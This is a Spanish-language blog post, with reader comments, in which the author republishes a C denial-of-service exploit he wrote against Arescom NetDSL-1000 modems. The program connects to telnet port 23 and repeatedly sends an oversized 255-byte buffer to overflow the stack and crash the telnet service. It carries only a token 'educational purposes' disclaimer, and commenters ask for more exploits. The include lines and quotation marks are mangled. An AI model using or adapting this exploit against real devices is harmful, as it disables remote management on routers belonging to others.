framirez exploit

Bueno aca les presento un exploit en mi tiempo que era UNDERGROUND y hacker. La publicación fue realizada hace 1 año y medio aproximadamente, fue programada en C y fue para los modems Arescom NetDSL-1000.

 

Aca les dejo el trozo de codigo publicado por mi:

/*
      Do you want to hack? les`t go .. free your mind
      Tu veux etre un hacker? allez .. if faut libere ta tete!
      Quieres hackear? dale .. libera tu mente
     
      Vulnerabilidad en modem Arescom NetDSL-1000
      por un buffer overflow debido < [255] en la pila stack.
     
      DoS atack por Fabian Ramirez S. <framirez@akori.fr>  
           www.framirez.com
    If you flood the telnet configuration a couple dozen times with long
 strings, eventually the telnetd service flat out dies. Routing functions
 of the NetDSL continue to work fine as before. It is unknown whether only
 the telnetd service is affected, other means of remote configuration may
 have become unavailable as well.

 Remember:     KING
     
      Solo para fines educativos! (CREEEEEEO ZEEEEEEEEEEE)
*/

#include
#include
#include
#include
#include
#include              

#define PORT 23
#define MAXDATASIZE 100    

char shellcode[]= “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1″
      “\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1″;

int main(int argc, char *argv[])
{
    int fd, numbytes,i;
    char buf[MAXDATASIZE];  
    struct hostent *he;                
    struct sockaddr_in server;  

    printf(“Exploit Arescom NetDSL-1000 executing\n”);
    printf (”         by framirez\n”);
   
    if (argc !=2) {
          printf(“Uso: %s \n”,argv[0]);
          exit(-1);
    }
     
    if ((he=gethostbyname(argv[1]))==NULL){            
          printf(“gethostbyname() error\n”);
          exit(-1);
    }

    if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){  
          printf(“socket() error\n”);
          exit(-1);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(PORT);
    server.sin_addr = *((struct in_addr *)he->h_addr);  

    if(connect(fd, (struct sockaddr *)&server,
          sizeof(struct sockaddr))==-1){
          printf(“ERROR conectando al host\n”);
          exit(-1);
    }
         
      for (i=0;i<3;i++)
      {
      send(fd,shellcode,255,0);
      }
     
      printf (“Exploit enviado con EXITO al destinatario\n”);
      printf (”             by framirez\n”);

    close(fd);

  return 1;
}
 

Si no me creen coloquen el google “framirez exploit”

Saludos y buena navegación proximos hackers :)

No hay Trackbacks

Puedes enviar un trackback usando esta URL: http://www.dokshor.com/framirez-exploit/trackback

5 Comentarios

  1. cristobal

    Hola, no entiendo para que modem me sirve, podrias ayudarme, un empujoncito que sea,como por correo, que modems me sirven y que se hace, ya que no entiendo nada?no cacho ibgles tampoco
    saludos

    Comentado 28 abril 2007 a las 21:10 | Permalink
  2. Fabían

    Buffer OVERFLOW :D

    Comentado 29 abril 2007 a las 23:20 | Permalink
  3. olxman

    Exelente pagina fabian..
    si tienes mas exploits se te agradeceria

    Comentado 7 julio 2007 a las 19:45 | Permalink
  4. portate bien mono shiko!

    Comentado 20 noviembre 2007 a las 10:34 | Permalink
  5. yoyi

    Hola Cauro Re%%/&(/) como estay malo pala .,….. , saludos Huachupe _______________/(

    Comentado 6 febrero 2008 a las 16:58 | Permalink

Escribe un Comentario

Tu e-mail nunca será compartido. Los campos requeridos están marcados *

*
*

dokshor.com (RSS) + Sator-ii theme by Felipe Lavín and finally edited by dokshor.

hacker emblem